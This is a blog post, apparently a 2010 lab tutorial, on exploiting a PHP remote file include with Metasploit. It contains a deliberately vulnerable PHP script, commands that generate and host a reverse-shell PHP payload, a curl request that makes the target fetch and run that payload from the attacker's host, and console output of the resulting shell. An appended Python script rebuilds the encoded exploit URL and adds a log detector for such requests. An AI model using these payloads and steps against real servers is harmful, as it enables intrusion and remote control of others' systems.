Monday, January 11, 2010

Using Metasploit PHP Payloads with remote file includes

Not completely sure how useful this will be to anyone, as it's probably already been well documented, but I just realized I could do it and thought I might share.

First off, find yourself a PHP script with a remote file include. For this example, I created one:

include_test.php:


<html>
        <body>
                <?php
                // Deliberately vulnerable: the file name comes straight from the query string.
                // Remote URLs are accepted only with allow_url_include=On (PHP 5.2+); otherwise it is still an LFI.
                require $_GET['include'];
                ?>
        </body>
</html>


Next, generate the PHP payload. Save it with a .txt extension so that your own web server hands out the source as plain text instead of executing it:
./msfpayload php/reverse_php LHOST=172.16.119.137 R > /var/www/include.php.txt

This just generates a reverse-connect PHP script. I also had to edit the file and enclose it in tags. Also, you can see that I placed it in my web server's root directory so that it's now publicly accessible.

Next up, start up your metasploit console and handler:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(handler) > set LHOST 172.16.119.137
LHOST => 172.16.119.137
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler on port 4444


Finally, request the URL to fire the remote file include:
curl 'http://172.16.119.136/apache2-default/include_test.php?include=http://172.16.119.137/include.php.txt'

And have fun:

[*] Command shell session 1 opened (172.16.119.137:4444 -> 172.16.119.136:32803)

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)



Update: @egyp7 on Twitter was awesome enough to point out that all of this could be simplified to:


msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set PHPURI /apache2-default/include_test.php?include=!URL!
PHPURI => /apache2-default/include_test.php?include=!URL!
msf exploit(php_include) > set RHOST 172.16.119.136
RHOST => 172.16.119.136
msf exploit(php_include) > set LHOST 172.16.119.137
LHOST => 172.16.119.137
msf exploit(php_include) > exploit

[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/siI1CLOjhRpr0DS
[*]  Local IP: http://172.16.119.137:8080/siI1CLOjhRpr0DS
[*] PHP include server started.
[*] Trying uri /apache2-default/include_test.php?include=%68%74%74%70%3a%2f%2f%31%37%32%2e%31%36%2e%31%31%39%2e%31%33%37%3a%38%30%38%30%2f%73%69%49%31%43%4c%4f%6a%68%52%70%72%30%44%53%3f
[*] Command shell session 1 opened (172.16.119.137:4444 -> 172.16.119.136:32823)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
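As an added example (not code from this post or from Metasploit), here is a Python script covering both halves of the above: it rebuilds the trigger URL that exploit/unix/webapp/php_include sent in the "Trying uri" line (every byte of the payload URL percent-encoded and substituted for the !URL! placeholder; the long hex string above decodes to http://172.16.119.137:8080/siI1CLOjhRpr0DS?, the trailing ? being the usual trick for swallowing any suffix the vulnerable script appends), and then, for the defender, pulls remote-URL include parameters out of Apache access-log lines so that both the plain curl request and the hex-encoded module request are caught by one check. Hosts and paths are the ones used in the post; the log lines are constructed for the example.

```python
"""Added example, not from the original post or from Metasploit.

Rebuilds the trigger URL that exploit/unix/webapp/php_include sent above and
flags remote-URL include parameters in Apache access-log lines.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The "Trying uri" line from the module, copied from the console output above.
MODULE_URI = (
    "/apache2-default/include_test.php?include="
    "%68%74%74%70%3a%2f%2f%31%37%32%2e%31%36%2e%31%31%39%2e%31%33%37%3a%38%30"
    "%38%30%2f%73%69%49%31%43%4c%4f%6a%68%52%70%72%30%44%53%3f"
)

# Schemes PHP's include/require will fetch when allow_url_include is on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")


def hex_encode_url(url):
    """Percent-encode every byte, the way php_include obfuscates its URL."""
    return "".join(f"%{b:02x}" for b in url.encode())


def build_trigger(target_base, phpuri, payload_url):
    """Substitute the encoded payload URL for the !URL! placeholder in PHPURI.

    The trailing '?' is the usual RFI trick: anything the vulnerable script
    concatenates after the include name (e.g. '.php') becomes a query string
    for the payload server instead of altering the path it requests.
    """
    return target_base + phpuri.replace("!URL!", hex_encode_url(payload_url + "?"))


REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def rfi_indicators(log_line):
    """Return (parameter, decoded value) pairs whose value is a remote URL.

    The value is decoded a second time so both a plain URL and the fully
    hex-encoded form Metasploit sends are caught by one check.
    """
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = []
    query = urlsplit(m.group(1)).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)
            if decoded.strip().lower().startswith(REMOTE_SCHEMES):
                hits.append((name, decoded))
    return hits


def scan(lines):
    """Keep only the log lines that carry an RFI indicator."""
    results = []
    for line in lines:
        hits = rfi_indicators(line)
        if hits:
            results.append((line, hits))
    return results


# Constructed Apache combined-log lines: the curl request from the post, the
# module's hex-encoded request, and one benign request.
SAMPLE_LOG = [
    '172.16.119.137 - - [11/Jan/2010:10:00:01 -0500] "GET /apache2-default/'
    'include_test.php?include=http://172.16.119.137/include.php.txt HTTP/1.1" '
    '200 512 "-" "curl/7.18.2"',
    '172.16.119.137 - - [11/Jan/2010:10:05:42 -0500] "GET ' + MODULE_URI
    + ' HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '10.0.0.5 - - [11/Jan/2010:10:06:00 -0500] "GET /apache2-default/'
    'include_test.php?include=header.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(hits)
```

The detector deliberately decodes the parameter value after parse_qs has already decoded it once, which is what lets a single startswith check match the hex-encoded request; a grep for a literal http:// in the raw log would miss the module's request entirely.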